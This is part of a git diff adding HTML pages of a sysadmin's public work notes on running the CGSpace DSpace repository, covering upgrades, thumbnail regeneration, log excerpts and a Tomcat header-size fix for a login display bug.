+<li>I&rsquo;m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn&rsquo;t as good</li>
+<li>The results were very good, I think that after we upgrade to 5.5 I will do it, perhaps one community / collection at a time:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p &#34;ImageMagick PDF Thumbnail&#34;
+</code></pre><ul>
+<li>In related news, I&rsquo;m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace&rsquo;s media filter has made thumbnails of THEM):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where text_value like &#39;%.jpg.jpg&#39;;
+</code></pre><ul>
+<li>I&rsquo;m not sure if there&rsquo;s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore&hellip;</li>
+</ul>
+<h2 id="2016-11-18">2016-11-18</h2>
+<ul>
+<li>Enable Tomcat Crawler Session Manager on CGSpace</li>
+</ul>
+<h2 id="2016-11-21">2016-11-21</h2>
+<ul>
+<li>More work on Ansible playbooks for PostgreSQL 9.3→9.5 and Java 7→8 work</li>
+<li>CGSpace virtual managers meeting</li>
+<li>I need to look into making the item thumbnail clickable</li>
+<li>Macaroni Bros said they tested the DSpace Test (DSpace 5.5) REST API for CCAFS and WLE sites and it works as expected</li>
+</ul>
+<h2 id="2016-11-23">2016-11-23</h2>
+<ul>
+<li>Upgrade Java from 7 to 8 on CGSpace</li>
+<li>I had started planning the inplace PostgreSQL 9.3→9.5 upgrade but decided that I will have to <code>pg_dump</code> and <code>pg_restore</code> when I move to the new server soon anyways, so there&rsquo;s no need to upgrade the database right now</li>
+<li>Chat with Carlos about CGCore and the CGSpace metadata registry</li>
+<li>Dump CGSpace metadata field registry for Carlos: <a href="https://gist.github.com/alanorth/8cbd0bb2704d4bbec78025b4742f8e70">https://gist.github.com/alanorth/8cbd0bb2704d4bbec78025b4742f8e70</a></li>
+<li>Send some feedback to Carlos on CG Core so they can better understand how DSpace/CGSpace uses metadata</li>
+<li>Notes about PostgreSQL tuning from James: <a href="https://paste.fedoraproject.org/488776/14798952/">https://paste.fedoraproject.org/488776/14798952/</a></li>
+<li>Play with Creative Commons stuff in DSpace submission step</li>
+<li>It seems to work but it doesn&rsquo;t let you choose a version of CC (like 4.0), and we would need to customize the XMLUI item display so it doesn&rsquo;t display the gross CC badges</li>
+</ul>
+<h2 id="2016-11-24">2016-11-24</h2>
+<ul>
+<li>Bizuwork was testing DSpace Test on DSPace 5.5 and noticed that the Listings and Reports module seems to be case sensitive, whereas CGSpace&rsquo;s Listings and Reports isn&rsquo;t (ie, a search for &ldquo;orth, alan&rdquo; vs &ldquo;Orth, Alan&rdquo; returns the same results on CGSpace, but different on DSpace Test)</li>
+<li>I have raised a ticket with Atmire</li>
+<li>Looks like this issue is actually the new Listings and Reports module honoring the Solr search queries more correctly</li>
+</ul>
+<h2 id="2016-11-27">2016-11-27</h2>
+<ul>
+<li>Run system updates on DSpace Test and reboot the server</li>
+<li>Deploy DSpace 5.5 on CGSpace:
+<ul>
+<li>maven package</li>
+<li>stop tomcat</li>
+<li>backup postgresql</li>
+<li>run Atmire 5.5 schema deletions</li>
+<li>delete the deployed spring folder</li>
+<li>ant update</li>
+<li>run system updates</li>
+<li>reboot server</li>
+</ul>
+</li>
+<li>Need to do updates for ansible infrastructure role defaults, and switch the GitHub branch to the new 5.5 one</li>
+<li>Testing DSpace 5.5 on CGSpace, it seems CUA&rsquo;s export as XLS works for Usage statistics, but not Content statistics</li>
+<li>I will raise a bug with Atmire</li>
+</ul>
+<h2 id="2016-11-28">2016-11-28</h2>
+<ul>
+<li>One user says they are still getting a blank page when he logs in (just CGSpace header, but no community list)</li>
+<li>Looking at the Catlina logs I see there is some super long-running indexing process going on:</li>
+</ul>
+<pre tabindex="0"><code>INFO: FrameworkServlet &#39;oai&#39;: initialization completed in 2600 ms
+[&gt;                                                  ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
+[&gt;                                                  ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
+[&gt;                                                  ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
+[&gt;                                                  ] 0% time remaining: 15 hour(s) 35 minute(s) 23 seconds. timestamp: 2016-11-28 03:00:19
+[&gt;                                                  ] 0% time remaining: 14 hour(s) 5 minute(s) 56 seconds. timestamp: 2016-11-28 03:00:19
+[&gt;                                                  ] 0% time remaining: 11 hour(s) 23 minute(s) 49 seconds. timestamp: 2016-11-28 03:00:19
+[&gt;                                                  ] 0% time remaining: 11 hour(s) 21 minute(s) 57 seconds. timestamp: 2016-11-28 03:00:20
+</code></pre><ul>
+<li>It says OAI, and seems to start at 3:00 AM, but I only see the <code>filter-media</code> cron job set to start then</li>
+<li>Double checking the <a href="https://wiki.lyrasis.org/display/DSDOC5x/Upgrading+DSpace">DSpace 5.x upgrade notes</a> for anything I missed, or troubleshooting tips</li>
+<li>Running some manual processes just in case:</li>
+</ul>
+<pre tabindex="0"><code>$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/dcterms-types.xml
+$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/dublin-core-types.xml
+$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/eperson-types.xml
+$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/workflow-types.xml
+</code></pre><ul>
+<li>Start working on paper for KM4Dev journal</li>
+<li>Wow, Bram from Atmire pointed out this solution for using multiple handles with one DSpace instance: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296">https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296</a></li>
+<li>We might be able to migrate the <a href="http://library.cgiar.org/">CGIAR Library</a> now, as they had wanted to keep their handles</li>
+</ul>
+<h2 id="2016-11-29">2016-11-29</h2>
+<ul>
+<li>Sisay tried deleting and re-creating Goshu&rsquo;s account but he still can&rsquo;t see any communities on the homepage after he logs in</li>
+<li>Around the time of his login I see this in the DSpace logs:</li>
+</ul>
+<pre tabindex="0"><code>2016-11-29 07:56:36,350 INFO  org.dspace.authenticate.LDAPAuthentication @ g.cherinet@cgiar.org:session_id=F628E13AB4EF2BA949198A99EFD8EBE4:ip_addr=213.55.99.121:failed_login:no DN found for user g.cherinet@cgiar.org
+2016-11-29 07:56:36,350 INFO  org.dspace.authenticate.PasswordAuthentication @ g.cherinet@cgiar.org:session_id=F628E13AB4EF2BA949198A99EFD8EBE4:ip_addr=213.55.99.121:authenticate:attempting password auth of user=g.cherinet@cgiar.org
+2016-11-29 07:56:36,352 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ g.cherinet@cgiar.org:session_id=F628E13AB4EF2BA949198A99EFD8EBE4:ip_addr=213.55.99.121:failed_login:email=g.cherinet@cgiar.org, realm=null, result=2
+2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
+2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
+2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
+2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item&#39;s bitstream stats
+2016-11-29 07:56:36,608 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
+2016-11-29 07:56:36,701 INFO  org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
+2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: Error executing query
+        at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:1618)
+        at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:1600)
+        at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:1583)
+        at org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer.performSearch(SidebarFacetsTransformer.java:165)
+        at org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer.addOptions(SidebarFacetsTransformer.java:174)
+        at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:228)
+        at sun.reflect.GeneratedMethodAccessor277.invoke(Unknown Source)
+...
+</code></pre><ul>
+<li>At about the same time in the solr log I see a super long query:</li>
+</ul>
+<pre tabindex="0"><code>2016-11-29 07:56:36,734 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=*:*&amp;fl=dateIssued.year,handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=dateIssued.year:[*+TO+*]&amp;fq=read:(g0+OR+e574+OR+g0+OR+g3+OR+g9+OR+g10+OR+g14+OR+g16+OR+g18+OR+g20+OR+g23+OR+g24+OR+g2072+OR+g2074+OR+g28+OR+g2076+OR+g29+OR+g2078+OR+g2080+OR+g34+OR+g2082+OR+g2084+OR+g38+OR+g2086+OR+g2088+OR+g2091+OR+g43+OR+g2092+OR+g2093+OR+g2095+OR+g2097+OR+g50+OR+g2099+OR+g51+OR+g2103+OR+g62+OR+g65+OR+g2115+OR+g2117+OR+g2119+OR+g2121+OR+g2123+OR+g2125+OR+g77+OR+g78+OR+g79+OR+g2127+OR+g80+OR+g2129+OR+g2131+OR+g2133+OR+g2134+OR+g2135+OR+g2136+OR+g2137+OR+g2138+OR+g2139+OR+g2140+OR+g2141+OR+g2142+OR+g2148+OR+g2149+OR+g2150+OR+g2151+OR+g2152+OR+g2153+OR+g2154+OR+g2156+OR+g2165+OR+g2167+OR+g2171+OR+g2174+OR+g2175+OR+g129+OR+g2182+OR+g2186+OR+g2189+OR+g153+OR+g158+OR+g166+OR+g167+OR+g168+OR+g169+OR+g2225+OR+g179+OR+g2227+OR+g2229+OR+g183+OR+g2231+OR+g184+OR+g2233+OR+g186+OR+g2235+OR+g2237+OR+g191+OR+g192+OR+g193+OR+g202+OR+g203+OR+g204+OR+g205+OR+g207+OR+g208+OR+g218+OR+g219+OR+g222+OR+g223+OR+g230+OR+g231+OR+g238+OR+g241+OR+g244+OR+g254+OR+g255+OR+g262+OR+g265+OR+g268+OR+g269+OR+g273+OR+g276+OR+g277+OR+g279+OR+g282+OR+g2332+OR+g2335+OR+g2338+OR+g292+OR+g293+OR+g2341+OR+g296+OR+g2344+OR+g297+OR+g2347+OR+g301+OR+g2350+OR+g303+OR+g305+OR+g2356+OR+g310+OR+g311+OR+g2359+OR+g313+OR+g2362+OR+g2365+OR+g2368+OR+g321+OR+g2371+OR+g325+OR+g2374+OR+g328+OR+g2377+OR+g2380+OR+g333+OR+g2383+OR+g2386+OR+g2389+OR+g342+OR+g343+OR+g2392+OR+g345+OR+g2395+OR+g348+OR+g2398+OR+g2401+OR+g2404+OR+g2407+OR+g364+OR+g366+OR+g2425+OR+g2427+OR+g385+OR+g387+OR+g388+OR+g389+OR+g2442+OR+g395+OR+g2443+OR+g2444+OR+g401+OR+g403+OR+g405+OR+g408+OR+g2457+OR+g2458+OR+g411+OR+g2459+OR+g414+OR+g2463+OR+g417+OR+g2465+OR+g2467+OR+g421+OR+g2469+OR+g2471+OR+g424+OR+g2473+OR+g2475+OR+g2476+OR+g429+OR+g433+OR+g2481+OR+g2482+OR+g2483+OR+g443+OR+g444+OR+g445+OR+g446+OR+g448+OR+g453+OR+g455+OR+g456+OR+g457+OR+g458+OR+g459+OR+g461+OR+g462+OR+g463+OR+g464+OR+g465+OR+g467+OR+g468+OR+g469+OR+g474+OR+g476+OR+g477+OR+g480+OR+g483+OR+g484+OR+g493+OR+g496+OR+g497+OR+g498+OR+g500+OR+g502+OR+g504+OR+g505+OR+g2559+OR+g2560+OR+g513+OR+g2561+OR+g515+OR+g516+OR+g518+OR+g519+OR+g2567+OR+g520+OR+g521+OR+g522+OR+g2570+OR+g523+OR+g2571+OR+g524+OR+g525+OR+g2573+OR+g526+OR+g2574+OR+g527+OR+g528+OR+g2576+OR+g529+OR+g531+OR+g2579+OR+g533+OR+g534+OR+g2582+OR+g535+OR+g2584+OR+g538+OR+g2586+OR+g540+OR+g2588+OR+g541+OR+g543+OR+g544+OR+g545+OR+g546+OR+g548+OR+g2596+OR+g549+OR+g551+OR+g555+OR+g556+OR+g558+OR+g561+OR+g569+OR+g570+OR+g571+OR+g2619+OR+g572+OR+g2620+OR+g573+OR+g2621+OR+g2622+OR+g575+OR+g578+OR+g581+OR+g582+OR+g584+OR+g585+OR+g586+OR+g587+OR+g588+OR+g590+OR+g591+OR+g593+OR+g595+OR+g596+OR+g598+OR+g599+OR+g601+OR+g602+OR+g603+OR+g604+OR+g605+OR+g606+OR+g608+OR+g609+OR+g610+OR+g612+OR+g614+OR+g616+OR+g620+OR+g621+OR+g623+OR+g630+OR+g635+OR+g636+OR+g646+OR+g649+OR+g683+OR+g684+OR+g687+OR+g689+OR+g691+OR+g695+OR+g697+OR+g698+OR+g699+OR+g700+OR+g701+OR+g707+OR+g708+OR+g709+OR+g710+OR+g711+OR+g712+OR+g713+OR+g714+OR+g715+OR+g716+OR+g717+OR+g719+OR+g720+OR+g729+OR+g732+OR+g733+OR+g734+OR+g736+OR+g737+OR+g738+OR+g2786+OR+g752+OR+g754+OR+g2804+OR+g757+OR+g2805+OR+g2806+OR+g760+OR+g761+OR+g2810+OR+g2815+OR+g769+OR+g771+OR+g773+OR+g776+OR+g786+OR+g787+OR+g788+OR+g789+OR+g791+OR+g792+OR+g793+OR+g794+OR+g795+OR+g796+OR+g798+OR+g800+OR+g802+OR+g803+OR+g806+OR+g808+OR+g810+OR+g814+OR+g815+OR+g817+OR+g829+OR+g830+OR+g849+OR+g893+OR+g895+OR+g898+OR+g902+OR+g903+OR+g917+OR+g919+OR+g921+OR+g922+OR+g923+OR+g924+OR+g925+OR+g926+OR+g927+OR+g928+OR+g929+OR+g930+OR+g932+OR+g933+OR+g934+OR+g938+OR+g939+OR+g944+OR+g945+OR+g946+OR+g947+OR+g948+OR+g949+OR+g950+OR+g951+OR+g953+OR+g954+OR+g955+OR+g956+OR+g958+OR+g959+OR+g960+OR+g963+OR+g964+OR+g965+OR+g968+OR+g969+OR+g970+OR+g971+OR+g972+OR+g973+OR+g974+OR+g976+OR+g978+OR+g979+OR+g984+OR+g985+OR+g987+OR+g988+OR+g991+OR+g993+OR+g994+OR+g999+OR+g1000+OR+g1003+OR+g1005+OR+g1006+OR+g1007+OR+g1012+OR+g1013+OR+g1015+OR+g1016+OR+g1018+OR+g1023+OR+g1024+OR+g1026+OR+g1028+OR+g1030+OR+g1032+OR+g1033+OR+g1035+OR+g1036+OR+g1038+OR+g1039+OR+g1041+OR+g1042+OR+g1044+OR+g1045+OR+g1047+OR+g1048+OR+g1050+OR+g1051+OR+g1053+OR+g1054+OR+g1056+OR+g1057+OR+g1058+OR+g1059+OR+g1060+OR+g1061+OR+g1062+OR+g1063+OR+g1064+OR+g1065+OR+g1066+OR+g1068+OR+g1071+OR+g1072+OR+g1074+OR+g1075+OR+g1076+OR+g1077+OR+g1078+OR+g1080+OR+g1081+OR+g1082+OR+g1084+OR+g1085+OR+g1087+OR+g1088+OR+g1089+OR+g1090+OR+g1091+OR+g1092+OR+g1093+OR+g1094+OR+g1095+OR+g1096+OR+g1097+OR+g1106+OR+g1108+OR+g1110+OR+g1112+OR+g1114+OR+g1117+OR+g1120+OR+g1121+OR+g1126+OR+g1128+OR+g1129+OR+g1131+OR+g1136+OR+g1138+OR+g1140+OR+g1141+OR+g1143+OR+g1145+OR+g1146+OR+g1148+OR+g1152+OR+g1154+OR+g1156+OR+g1158+OR+g1159+OR+g1160+OR+g1162+OR+g1163+OR+g1165+OR+g1166+OR+g1168+OR+g1170+OR+g1172+OR+g1175+OR+g1177+OR+g1179+OR+g1181+OR+g1185+OR+g1191+OR+g1193+OR+g1197+OR+g1199+OR+g1201+OR+g1203+OR+g1204+OR+g1215+OR+g1217+OR+g1219+OR+g1221+OR+g1224+OR+g1226+OR+g1227+OR+g1228+OR+g1230+OR+g1231+OR+g1232+OR+g1233+OR+g1234+OR+g1235+OR+g1236+OR+g1237+OR+g1238+OR+g1240+OR+g1241+OR+g1242+OR+g1243+OR+g1244+OR+g1246+OR+g1248+OR+g1250+OR+g1252+OR+g1254+OR+g1256+OR+g1257+OR+g1259+OR+g1261+OR+g1263+OR+g1275+OR+g1276+OR+g1277+OR+g1278+OR+g1279+OR+g1282+OR+g1284+OR+g1288+OR+g1290+OR+g1293+OR+g1296+OR+g1297+OR+g1299+OR+g1303+OR+g1304+OR+g1306+OR+g1309+OR+g1310+OR+g1311+OR+g1312+OR+g1313+OR+g1316+OR+g1318+OR+g1320+OR+g1322+OR+g1323+OR+g1324+OR+g1325+OR+g1326+OR+g1329+OR+g1331+OR+g1347+OR+g1348+OR+g1361+OR+g1362+OR+g1363+OR+g1364+OR+g1367+OR+g1368+OR+g1369+OR+g1370+OR+g1371+OR+g1374+OR+g1376+OR+g1377+OR+g1378+OR+g1380+OR+g1381+OR+g1386+OR+g1389+OR+g1391+OR+g1392+OR+g1393+OR+g1395+OR+g1396+OR+g1397+OR+g1400+OR+g1402+OR+g1406+OR+g1408+OR+g1415+OR+g1417+OR+g1433+OR+g1435+OR+g1441+OR+g1442+OR+g1443+OR+g1444+OR+g1446+OR+g1448+OR+g1450+OR+g1451+OR+g1452+OR+g1453+OR+g1454+OR+g1456+OR+g1458+OR+g1460+OR+g1462+OR+g1464+OR+g1466+OR+g1468+OR+g1470+OR+g1471+OR+g1475+OR+g1476+OR+g1477+OR+g1478+OR+g1479+OR+g1481+OR+g1482+OR+g1483+OR+g1484+OR+g1485+OR+g1486+OR+g1487+OR+g1488+OR+g1489+OR+g1490+OR+g1491+OR+g1492+OR+g1493+OR+g1495+OR+g1497+OR+g1499+OR+g1501+OR+g1503+OR+g1504+OR+g1506+OR+g1508+OR+g1511+OR+g1512+OR+g1513+OR+g1516+OR+g1522+OR+g1535+OR+g1536+OR+g1537+OR+g1539+OR+g1540+OR+g1541+OR+g1542+OR+g1547+OR+g1549+OR+g1551+OR+g1553+OR+g1555+OR+g1557+OR+g1559+OR+g1561+OR+g1563+OR+g1565+OR+g1567+OR+g1569+OR+g1571+OR+g1573+OR+g1580+OR+g1583+OR+g1588+OR+g1590+OR+g1592+OR+g1594+OR+g1595+OR+g1596+OR+g1598+OR+g1599+OR+g1600+OR+g1601+OR+g1602+OR+g1604+OR+g1606+OR+g1610+OR+g1611+OR+g1612+OR+g1613+OR+g1616+OR+g1619+OR+g1622+OR+g1624+OR+g1625+OR+g1626+OR+g1628+OR+g1629+OR+g1631+OR+g1632+OR+g1692+OR+g1694+OR+g1695+OR+g1697+OR+g1705+OR+g1706+OR+g1707+OR+g1708+OR+g1711+OR+g1715+OR+g1717+OR+g1719+OR+g1721+OR+g1722+OR+g1723+OR+g1724+OR+g1725+OR+g1726+OR+g1727+OR+g1731+OR+g1732+OR+g1736+OR+g1737+OR+g1738+OR+g1740+OR+g1742+OR+g1743+OR+g1753+OR+g1755+OR+g1758+OR+g1759+OR+g1764+OR+g1766+OR+g1769+OR+g1774+OR+g1782+OR+g1794+OR+g1796+OR+g1797+OR+g1814+OR+g1818+OR+g1826+OR+g1853+OR+g1855+OR+g1857+OR+g1858+OR+g1859+OR+g1860+OR+g1861+OR+g1863+OR+g1864+OR+g1865+OR+g1867+OR+g1869+OR+g1871+OR+g1873+OR+g1875+OR+g1877+OR+g1879+OR+g1881+OR+g1883+OR+g1884+OR+g1885+OR+g1887+OR+g1889+OR+g1891+OR+g1892+OR+g1894+OR+g1896+OR+g1898+OR+g1900+OR+g1902+OR+g1907+OR+g1910+OR+g1915+OR+g1916+OR+g1917+OR+g1918+OR+g1929+OR+g1931+OR+g1932+OR+g1933+OR+g1934+OR+g1936+OR+g1937+OR+g1938+OR+g1939+OR+g1940+OR+g1942+OR+g1944+OR+g1945+OR+g1948+OR+g1950+OR+g1955+OR+g1961+OR+g1962+OR+g1964+OR+g1966+OR+g1968+OR+g1970+OR+g1972+OR+g1974+OR+g1976+OR+g1979+OR+g1982+OR+g1984+OR+g1985+OR+g1986+OR+g1987+OR+g1989+OR+g1991+OR+g1996+OR+g2003+OR+g2007+OR+g2011+OR+g2019+OR+g2020+OR+g2046)&amp;sort=dateIssued.year_sort+desc&amp;rows=1&amp;wt=javabin&amp;version=2} hits=56080 status=0 QTime=3
+</code></pre><ul>
+<li>Which, according to some old threads on DSpace Tech, means that the user has a lot of permissions (from groups or on the individual eperson) which increases the Solr query size / query URL</li>
+<li>It might be fixed by increasing the Tomcat <code>maxHttpHeaderSize</code>, which is <a href="http://tomcat.apache.org/tomcat-7.0-doc/config/http.html">8192 (or 8KB) by default</a></li>
+<li>I&rsquo;ve increased the <code>maxHttpHeaderSize</code> to 16384 on DSpace Test and the user said he is now able to see the communities on the homepage</li>
+<li>I will make the changes on CGSpace soon</li>
+<li>A few users are reporting having issues with their workflows, they get the following message: &ldquo;You are not allowed to perform this task&rdquo;</li>
+<li>Might be the same as <a href="https://jira.duraspace.org/browse/DS-2920">DS-2920</a> on the bug tracker</li>
+</ul>
+<h2 id="2016-11-30">2016-11-30</h2>
+<ul>
+<li>The <code>maxHttpHeaderSize</code> fix worked on CGSpace (user is able to see the community list on the homepage)</li>
+<li>The &ldquo;take task&rdquo; cache fix worked on DSpace Test but it&rsquo;s not an official patch, so I&rsquo;ll have to report the bug to DSpace people and try to get advice</li>
+<li>More work on the KM4Dev Journal article</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-12/index.html b/docs/2016-12/index.html
new file mode 100644
index 000000000..177f0c3f1
--- /dev/null
+++ b/docs/2016-12/index.html
@@ -0,0 +1,838 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2016" />
+<meta property="og:description" content="2016-12-02
+
+CGSpace was down for five hours in the morning while I was sleeping
+While looking in the logs for errors, I see tons of warnings about Atmire MQM:
+
+2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+
+I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
+I&rsquo;ve raised a ticket with Atmire to ask
+Another worrying error from dspace.log is:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-12/" />
+<meta property="article:published_time" content="2016-12-02T10:43:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2016"/>
+<meta name="twitter:description" content="2016-12-02
+
+CGSpace was down for five hours in the morning while I was sleeping
+While looking in the logs for errors, I see tons of warnings about Atmire MQM:
+
+2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+
+I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
+I&rsquo;ve raised a ticket with Atmire to ask
+Another worrying error from dspace.log is:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-12/",
+  "wordCount": "4078",
+  "datePublished": "2016-12-02T10:43:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-12/">
+
+    <title>December, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
